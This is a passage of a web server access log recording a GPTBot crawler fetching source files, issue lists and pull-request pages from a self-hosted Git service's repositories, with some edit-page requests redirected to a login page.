GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PythonTest/import%20sys.py" +[17/Feb/2026:18:00:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11419] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PythonTest/import%20sys.py" +[17/Feb/2026:18:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/PythonTest/import%20sys.py" +[17/Feb/2026:18:00:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py?display=source" [Client 74.7.227.38] [Length 11418] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/PythonTest/import%20sys.py" +[17/Feb/2026:18:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?labels=0&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10169] [Gzip 3.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:00:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?labels=0&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10005] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:00:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9982] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&labels=0&state=all&type=all" +[17/Feb/2026:18:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?state=all&type=all" [Client 74.7.227.38] [Length 10084] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:18:00:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp?display=rendered" [Client 74.7.227.38] [Length 11028] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/transport.hpp" +[17/Feb/2026:18:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:18:00:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp?display=rendered" [Client 74.7.227.38] [Length 11087] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/itransport.hpp" +[17/Feb/2026:18:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp?display=rendered" [Client 74.7.227.38] [Length 11091] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/industrial-comm/cpp/include/controller.hpp" +[17/Feb/2026:18:00:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/log_macros.hpp" +[17/Feb/2026:18:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp?display=rendered" [Client 74.7.227.38] [Length 11074] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/app_init.hpp" +[17/Feb/2026:18:00:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp?display=source" [Client 74.7.227.38] [Length 13351] [Gzip 4.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/industrial-comm/cpp/include/modbus_tcp.hpp" +[17/Feb/2026:18:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10152] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:00:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10154] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:00:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9993] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9984] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:00:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10155] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9988] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:00:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 9991] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10167] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&state=all&type=all" +[17/Feb/2026:18:00:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&project=-1&state=all&type=all" [Client 74.7.227.38] [Length 10148] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&state=all&type=all" +[17/Feb/2026:18:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&state=all&type=all" [Client 74.7.227.38] [Length 10157] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:00:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:00:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec?display=source" [Client 74.7.227.38] [Length 12385] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:18:00:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec?display=rendered" [Client 74.7.227.38] [Length 10899] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_Final.spec" +[17/Feb/2026:18:00:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec?display=rendered" [Client 74.7.227.38] [Length 10891] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/gold_monitor_full.spec" +[17/Feb/2026:18:00:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_org.py" +[17/Feb/2026:18:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py?display=source" [Client 74.7.227.38] [Length 17406] [Gzip 5.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/GoldMonitor_VeryGood.py" +[17/Feb/2026:18:00:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresPatrol/watchdog_final_debug.spec" +[17/Feb/2026:18:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10138] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues" +[17/Feb/2026:18:00:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10025] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:18:00:32 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:18:00:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=closed&type=all" [Client 74.7.227.38] [Length 10192] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=closed&type=all" +[17/Feb/2026:18:00:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&state=open&type=all" +[17/Feb/2026:18:00:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:18:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json?display=source" [Client 74.7.227.38] [Length 11717] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/package.json" +[17/Feb/2026:18:00:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal?display=rendered" [Client 74.7.227.38] [Length 11108] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:18:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10241] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/issues?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:18:00:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10071] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28any%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:18:00:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10072] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?assignee=%28none%29&labels=0&sort=oldest&state=open&type=all" +[17/Feb/2026:18:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&state=all&type=all" [Client 74.7.227.38] [Length 10096] [Gzip 3.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:00:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&state=open&type=all" [Client 74.7.227.38] [Length 9936] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls" +[17/Feb/2026:18:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 963] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:18:00:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/normalizer" [Client 74.7.227.38] [Length 11774] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin" +[17/Feb/2026:18:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 9837] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:18:00:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/.venv/bin/uvicorn" [Client 74.7.227.38] [Length 9834] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:18:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 255] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:18:00:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/.venv/bin/watchfiles" [Client 74.7.227.38] [Length 10683] [Gzip 3.31] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:18:00:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log?display=source" [Client 74.7.227.38] [Length 41157] [Gzip 9.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_access.log" +[17/Feb/2026:18:00:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log?display=source" [Client 74.7.227.38] [Length 21125] [Gzip 7.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/npm/data/logs/fallback_http_error.log" +[17/Feb/2026:18:00:42 